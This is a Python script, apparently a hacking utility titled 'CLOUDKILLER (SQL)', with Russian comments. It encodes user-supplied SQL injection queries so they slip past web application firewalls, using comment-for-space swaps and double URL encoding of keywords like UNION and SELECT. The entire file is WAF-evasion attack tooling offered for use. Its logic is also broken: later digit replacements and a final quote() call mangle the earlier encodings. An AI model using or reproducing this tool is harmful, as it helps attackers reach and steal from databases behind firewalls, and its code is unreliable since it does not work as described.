import urllib.parse
from colorama import Fore, Style, init

# Инициализация colorama
init(autoreset=True)

def print_ascii_art():
    ascii_art = r"""
░█████╗░██╗░░░░░░█████╗░██╗░░░██╗██████╗░██╗░░██╗██╗██╗░░░░░██╗░░░░░███████╗██████╗░
██╔══██╗██║░░░░░██╔══██╗██║░░░██║██╔══██╗██║░██╔╝██║██║░░░░░██║░░░░░██╔════╝██╔══██╗
██║░░╚═╝██║░░░░░██║░░██║██║░░░██║██║░░██║█████═╝░██║██║░░░░░██║░░░░░█████╗░░██████╔╝
██║░░██╗██║░░░░░██║░░██║██║░░░██║██║░░██║██╔═██╗░██║██║░░░░░██║░░░░░██╔══╝░░██╔══██╗
╚█████╔╝███████╗╚█████╔╝╚██████╔╝██████╔╝██║░╚██╗██║███████╗███████╗███████╗██║░░██║
░╚════╝░╚══════╝░╚════╝░░╚═════╝░╚═════╝░╚═╝░░╚═╝╚═╝╚══════╝╚══════╝╚══════╝╚═╝░░╚═╝

░░██╗░██████╗░██████╗░██╗░░░░░██╗░░
░██╔╝██╔════╝██╔═══██╗██║░░░░░╚██╗░
██╔╝░╚█████╗░██║██╗██║██║░░░░░░╚██╗
╚██╗░░╚═══██╗╚██████╔╝██║░░░░░░██╔╝
░╚██╗██████╔╝░╚═██╔═╝░███████╗██╔╝░
░░╚═╝╚═════╝░░░░╚═╝░░░╚══════╝╚═╝░░
"""
    print(Fore.RED + ascii_art + Style.RESET_ALL)

def encode_query(query):
    # Замены для обхода WAF
    replacements = {
        'OR': '%256f%72',           # заменяем OR на нестандартную кодировку
        'AND': '%2561%6E%64',       # заменяем AND на нестандартную кодировку
        'UNION': '%2569%6E%6F%6E',   # заменяем UNION на нестандартную кодировку
        'SELECT': '%2565%6C%65%63%74',  # заменяем SELECT на нестандартную кодировку
        '=': '%253D',               # заменяем = на %253D
        '!=': '%2521%253D',         # заменяем != на %2521%253D
        '--': '%252D%252D',         # заменяем -- на %252D%252D
        ';': '%253B',               # заменяем ; на %253B
        '#': '%2523',               # заменяем # на %2523
        '1': '%31',                 # заменяем 1 на %31
        '0': '%30',                 # заменяем 0 на %30
        '2': '%32',                 # заменяем 2 на %32
        'NULL': '%4E%55%4C%4C',     # заменяем NULL на нестандартную кодировку
        'IS': '%49%53',             # добавляем замену для IS
    }

    # Заменяем пробелы и знаки +
    query = query.replace(' ', '/**/').replace('+', '%2B')

    # Заменяем все символы
    for old, new in replacements.items():
        query = query.replace(old, new)

    # Кодируем оставшиеся символы в URL формате
    query = urllib.parse.quote(query, safe='')

    return query

def main():
    print_ascii_art()  # Выводим ASCII-арт
    print("Введите SQL запрос:")
    sql_query = input()  # Ввод SQL-запроса
    encoded_query = encode_query(sql_query)  # Применяем кодирование
    print("\nЗакодированный SQL запрос:\n")
    print(encoded_query)

if __name__ == "__main__":
    main()
